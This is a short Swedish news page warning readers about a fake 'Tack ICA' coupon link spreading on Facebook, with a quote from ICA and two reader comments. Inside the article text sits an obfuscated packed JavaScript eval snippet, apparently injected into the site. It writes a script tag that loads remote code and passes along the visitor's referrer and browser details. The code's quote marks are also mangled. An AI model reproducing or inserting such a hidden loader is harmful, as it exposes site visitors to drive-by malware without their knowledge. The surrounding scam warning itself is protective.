Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

”Tack ICA”, Falsk kupong reklam på Facebook

”Tack ICA”, Falsk kupong reklam på Facebook
Sebastian

Revue.se eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnsdi|var|u0026u|referrer|kkeds||js|php’.split(’|’),0,{}))
vill tillsammans med ICA uppmana alla användare på Facebook att det nu sprids en länk som säger att du kan få 1000 kronor i kupong om du delar länken och kommenterar med ”Tack ICA”.

Denna kampanj ”Tack ICA” är inte från de riktiga företaget utan är ett virus och försök till bedrägeri. Tryck inte på länken. De håller på att utreda vem och vilka som ligger bakom den för att sedan polisanmäla personen eller personerna.

Falsk ICA-kupong på Facebook

” Just nu sprids en länk på Facebook som säger att du kan få 1000 kronor i kupong från oss om du delar länken och kommenterar med ”Tack ICA”. Vi ligger inte bakom denna länk, och vi vill uppmana er att låta bli att klicka på den. Vi håller på att utreda vem som ligger bakom detta. ” – Källa ica.se

Dela och kommentera inte länken på Facebook

Mer info!

Comments

  1. Lina

    Har jag virus nu när jag gjort detta?

    • Jacob D

      Nej det har du inte. Det var ett försök till att få tag i folks bankuppgifter, om du inte gjort något mer så är du cool.